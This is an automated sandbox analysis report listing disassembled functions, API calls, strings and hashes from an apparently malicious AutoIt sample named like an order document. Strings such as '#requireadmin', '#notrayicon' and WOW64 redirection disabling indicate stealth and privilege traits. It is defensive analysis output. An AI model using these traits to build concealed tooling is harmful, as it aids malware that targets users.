Opcode ID: 3a5325152bbd00a09edd0507e0610b31aacc21fd4ecdcdbb0d7c0edd64689abc
Instruction ID: 3aff07ce1c7814c44e8ae3bc112df5a492701ed3e9acc499b7942ee1624d7a21
Opcode Fuzzy Hash: 3a5325152bbd00a09edd0507e0610b31aacc21fd4ecdcdbb0d7c0edd64689abc
Instruction Fuzzy Hash: ABF0C234AA0218FBDB129F94DC49BEDBFB8EF48711F0040A4F905A2260CF709E50CB90

Function 00284E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00284EDD,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00284EAE
FreeLibrary.KERNEL32(00000000,?,?,00284EDD,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284EC0

Strings

kernel32.dll, xrefs: 00284E94
Wow64DisableWow64FsRedirection, xrefs: 00284EA8

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 16d158510ebe3f048cc2769a894685a65a405215835bdbbc196feda461ded069
Instruction ID: f4392bc0279d85ce606a432c2abbda82851e968ce8886327c24b215026870e7e
Opcode Fuzzy Hash: 16d158510ebe3f048cc2769a894685a65a405215835bdbbc196feda461ded069
Instruction Fuzzy Hash: 35E0CD39AB35236BD2333F256C18BDFA69CAF85F62F055125FC01E3140DB60CD1141A0

Function 00284E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 00284E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00284E74
FreeLibrary.KERNEL32(00000000), ref: 00284E87

Strings

kernel32.dll, xrefs: 00284E5B
Wow64RevertWow64FsRedirection, xrefs: 00284E6E

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: fe0c6d0d793b9904aca06dd4ae6da964b7f925e5221a8fab5de607d07e0e09f9
Instruction ID: 50e33c5f83ae63a76e373d1142d4fd4a3d18809dd15606a653b399383cf4bc9e
Opcode Fuzzy Hash: fe0c6d0d793b9904aca06dd4ae6da964b7f925e5221a8fab5de607d07e0e09f9
Instruction Fuzzy Hash: 73D012395A36236756233F256C18DCB6A1CAF89B517059525F905E6154CF60CD1186D0

Function 00299639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00299693
SelectObject.GDI32(?,00000000), ref: 002996A2
BeginPath.GDI32(?), ref: 002996B9
SelectObject.GDI32(?,00000000), ref: 002996E2

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 718042d2cd6805231b706931ad6807aabf5cd9aa4e1f372b4aea634e1ae5decd
Instruction ID: 4ba9e368be124139fce1628bcec1a10c77329cb993986e4e4794ce10b72d8908
Opcode Fuzzy Hash: 718042d2cd6805231b706931ad6807aabf5cd9aa4e1f372b4aea634e1ae5decd
Instruction Fuzzy Hash: 9F217C71822306EBDF129F68EC187E93BADBB15366F10421AF411A61B0D3709CA1CFD4

Function 002DFFED Relevance: 7.6, APIs: 5, Instructions: 59stringCOMMON

Download Yara Rule

APIs

Part of subcall function 002E0AC2: RaiseException.KERNEL32(8007000E,002E035E,00000000,00000000,?,002E000D,-C000001E,00000001,?,002DFF41,80070057,?,?,?,002E035E), ref: 002E0ACF

CLSIDFromProgID.COMBASE ref: 002E002B
ProgIDFromCLSID.COMBASE(00000000,00000000), ref: 002E0046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,00000000,?,?,-C000001E,00000001,?,002DFF41,80070057,?,?), ref: 002E0054
CoTaskMemFree.COMBASE(00000000), ref: 002E0064
CLSIDFromString.COMBASE(?,00000000), ref: 002E0070

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: From$Prog$ExceptionFreeRaiseStringTasklstrcmpi
String ID:
API String ID: 450394209-0
Opcode ID: 8040400bef763df7875311d7af69d311d0a4dd09f15867aa8f8b5d64841713ec
Instruction ID: 2e2c67ba967e22a4ce04b4fdd28f72f19b4471765e51ecc7e4fd6c1a2b49c4e5
Opcode Fuzzy Hash: 8040400bef763df7875311d7af69d311d0a4dd09f15867aa8f8b5d64841713ec
Instruction Fuzzy Hash: 3D112B726A0209FFDB115F65DC84BDA3AEDEF48351F148524F905D6210D7B4DDC187A0

Function 002EE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000), ref: 002EE997
QueryPerformanceFrequency.KERNEL32(?), ref: 002EE9A5
Sleep.KERNEL32(00000000), ref: 002EE9AD
QueryPerformanceCounter.KERNEL32(?), ref: 002EE9B7
Sleep.KERNEL32(?,00000000), ref: 002EE9F3

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 4a525413fa4918045d71455d56743affc875730e1b218a20e1bd6f1dfdf632d9
Instruction ID: 9581e8cbf32d1dafc75f0d54fdb8bc537e48e7217f34c25287c8951366327458
Opcode Fuzzy Hash: 4a525413fa4918045d71455d56743affc875730e1b218a20e1bd6f1dfdf632d9
Instruction Fuzzy Hash: 2B015B31CA1629EBCF009FE6D849AEDBBB8BB0C300F414556E502B2242DB309564CBA2

Function 002F030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,002F017D,?,002F32FC,?,00000001,002C2592,?), ref: 002F0324
CloseHandle.KERNEL32(?,?,?,?,002F017D,?,002F32FC,?,00000001,002C2592,?), ref: 002F0331
CloseHandle.KERNEL32(?,?,?,?,002F017D,?,002F32FC,?,00000001,002C2592,?), ref: 002F033E
CloseHandle.KERNEL32(?,?,?,?,002F017D,?,002F32FC,?,00000001,002C2592,?), ref: 002F034B
CloseHandle.KERNEL32(?,?,?,?,002F017D,?,002F32FC,?,00000001,002C2592,?), ref: 002F0358
CloseHandle.KERNEL32(?,?,?,?,002F017D,?,002F32FC,?,00000001,002C2592,?), ref: 002F0365

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: adbd946d2b480d3bebe3d0493ce268e8f1af1ff0cc7b8cc7d909bfa0016b29de
Instruction ID: 8e8728f3e52d46628387a3ffe3e808ef19f2249cf12acbb4071e792f7235e29f
Opcode Fuzzy Hash: adbd946d2b480d3bebe3d0493ce268e8f1af1ff0cc7b8cc7d909bfa0016b29de
Instruction Fuzzy Hash: 4801A276810B1A9FC7309F66D8C0826F7F9BF503553158A7FD29652932C371A964CF80

Function 002995C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 002995D4
StrokeAndFillPath.GDI32(?,?,002D71F7,00000000,?,?,?), ref: 002995F0
SelectObject.GDI32(?,00000000), ref: 00299603
DeleteObject.GDI32 ref: 00299616
StrokePath.GDI32(?), ref: 00299631

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 1f671382b2d2b0bd1b6ecd192df1a1ad731230aff86862e81c9b3d5cf7305521
Instruction ID: c6d965618ea841e8254e40f4fcb83864df27d2763b233b65d2f63eda3c8fc143
Opcode Fuzzy Hash: 1f671382b2d2b0bd1b6ecd192df1a1ad731230aff86862e81c9b3d5cf7305521
Instruction Fuzzy Hash: 2FF01431066309EBDB235F69ED18BA93B6DAB09332F048228F465950F0C73089A1DFA4

Function 003061D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 002A0242: RtlEnterCriticalSection.NTDLL(0035070C), ref: 002A024D
Part of subcall function 002A0242: RtlLeaveCriticalSection.NTDLL(0035070C), ref: 002A028A

__Init_thread_footer.LIBCMT ref: 00306238

Part of subcall function 002A01F8: RtlEnterCriticalSection.NTDLL(0035070C), ref: 002A0202
Part of subcall function 002A01F8: RtlLeaveCriticalSection.NTDLL(0035070C), ref: 002A0235

Strings

x#5, xrefs: 0030633A
x#5, xrefs: 00306353
x#5, xrefs: 0030636F

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: x#5$x#5$x#5
API String ID: 4132704954-943734617
Opcode ID: 0343cd423af70975e326ab5a1680f2073aa0c8ae2822d7da40d324b6b8e08a27
Instruction ID: 84d0e76792b02bf6de1f99256960223a38f57e0a339988b40ca43927dd23c4d3
Opcode Fuzzy Hash: 0343cd423af70975e326ab5a1680f2073aa0c8ae2822d7da40d324b6b8e08a27
Instruction Fuzzy Hash: 0FC1B071A01209AFCB15DF58C8A1EBEB7B9FF49300F158069F9059B295DB70ED64CB90

Function 00307B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 002A0242: RtlEnterCriticalSection.NTDLL(0035070C), ref: 002A024D
Part of subcall function 002A0242: RtlLeaveCriticalSection.NTDLL(0035070C), ref: 002A028A

Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD

__Init_thread_footer.LIBCMT ref: 00307BFB

Part of subcall function 002A01F8: RtlEnterCriticalSection.NTDLL(0035070C), ref: 002A0202
Part of subcall function 002A01F8: RtlLeaveCriticalSection.NTDLL(0035070C), ref: 002A0235

Strings

Variable must be of type 'Object'., xrefs: 00307C3A
5, xrefs: 00307C78
G, xrefs: 00307C7F

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 2919631681-3733170431
Opcode ID: 9dda13948a3ee5df790af28d60b665f153af41c458fc8bfcff64e21af71e3208
Instruction ID: 958c711d493bd297b141619b8af077acfae9d528f4a3136e4e257df7c9ded41b
Opcode Fuzzy Hash: 9dda13948a3ee5df790af28d60b665f153af41c458fc8bfcff64e21af71e3208
Instruction Fuzzy Hash: 44919C74A06209AFCB16EF54D8A0DAEB7B5BF49300F108059F8069B291DB31AE55CB50

Function 002EC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 002EC306
DeleteMenu.USER32(?,00000007,00000000), ref: 002EC34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00351990,010A49D0), ref: 002EC395

Strings

0, xrefs: 002EC2DF

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 516533a341b0cecb5cc95f69dfbff9d54470dc22e6040121037081a860591cdc
Instruction ID: d55d9c040c265301a32ab017c530ad2ec3b82a2ccec7f5ce4151a8d1406cdd43
Opcode Fuzzy Hash: 516533a341b0cecb5cc95f69dfbff9d54470dc22e6040121037081a860591cdc
Instruction Fuzzy Hash: 874103312543829FD720DF66D844F5ABBE8AF85310F6086ADF8A5972D1C730E815CB62

Function 002E95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 002E961D

Strings

#notrayicon, xrefs: 002E95B7
#requireadmin, xrefs: 002E95D9
#OnAutoItStartRegister, xrefs: 002E95F3

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 86e2f61398d5a67e8b745938061ca8a3115d0743b749dcec13246df1dbeced73
Instruction ID: ff1bd461d6cccee79fd01d323b6f7ed2b318c608720cb4035a211425ba90f638
Opcode Fuzzy Hash: 86e2f61398d5a67e8b745938061ca8a3115d0743b749dcec13246df1dbeced73
Instruction Fuzzy Hash: F82149722B459267C331AB269802FEB739C9F55300F904427FA4997081EB909DF1C691

Function 002E007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2a197fc5684a363a7784f61f7807ed4f024fd6599885df23e6f58bd46e49835
Instruction ID: c513465fe415adc06f6f893ec5d2f028b56d481237048fd6c3487c480f6d5148
Opcode Fuzzy Hash: a2a197fc5684a363a7784f61f7807ed4f024fd6599885df23e6f58bd46e49835
Instruction Fuzzy Hash: A6C18B75A50246EFDB04CFA5C884AAEB7B5FF48304F608598E905EF251C7B0ED92CB90

Function 002BD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00000004,00000000,00000000,?,00000012,00000000,?,00000001,00000004,?,00000001,?,?), ref: 002BD910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 002BD999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 002BD9AB
__freea.LIBCMT ref: 002BD9B4

Part of subcall function 002B3820: RtlAllocateHeap.NTDLL(00000000,?,00000004), ref: 002B3852

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 2817e7d887bea53a457463bf56ae8053789891bd31650e1efed12eb3d0b129b7
Instruction ID: a722e96f178074a179916154b79bd0b9c04f85fdc455301e26ecc6c9a4aa3117
Opcode Fuzzy Hash: 2817e7d887bea53a457463bf56ae8053789891bd31650e1efed12eb3d0b129b7
Instruction Fuzzy Hash: BC31CD72A2060AABDF25DF64DC81EEE7BA9EB41350F054268FC04D7251EB35DD64CBA0

Function 003152C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00315352
GetWindowLongW.USER32(?,000000F0), ref: 00315375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00315382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003153A8

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: b81715e47c289c164909c6b2ee58368852ea493d0bde07b8a0a64edf5c4cac1f
Instruction ID: a3ce2ba7f55f463bf4e2fa896fddb6192c8b2855f8c055193b86db88220a8b32
Opcode Fuzzy Hash: b81715e47c289c164909c6b2ee58368852ea493d0bde07b8a0a64edf5c4cac1f
Instruction Fuzzy Hash: 9031C838A55A08EFEB3F9F14CC15BE87769AB8C390F595901F620971E1C7B09DC0AB51

Function 00317674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0031769A
GetWindowRect.USER32(?,?), ref: 00317710
PtInRect.USER32(?,?,?), ref: 00317720
MessageBeep.USER32(00000000), ref: 0031778C

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 8a33d8090bc4878a36b17a24eea927adf6fbc7ed87510dd9fe2d2830192d1e7d
Instruction ID: b4fe9a20ef2cb7db8065621d76e8b817ac1efd9e37478d20dfb1ac12b8071306
Opcode Fuzzy Hash: 8a33d8090bc4878a36b17a24eea927adf6fbc7ed87510dd9fe2d2830192d1e7d
Instruction Fuzzy Hash: F2415A74A092149FCB1BCF58C894EE9B7F9BB4D355F1981A8E8149B2A1C730E981CB90

Function 002EDF95 Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00287620: _wcslen.LIBCMT ref: 00287625

_wcslen.LIBCMT ref: 002EDFCB
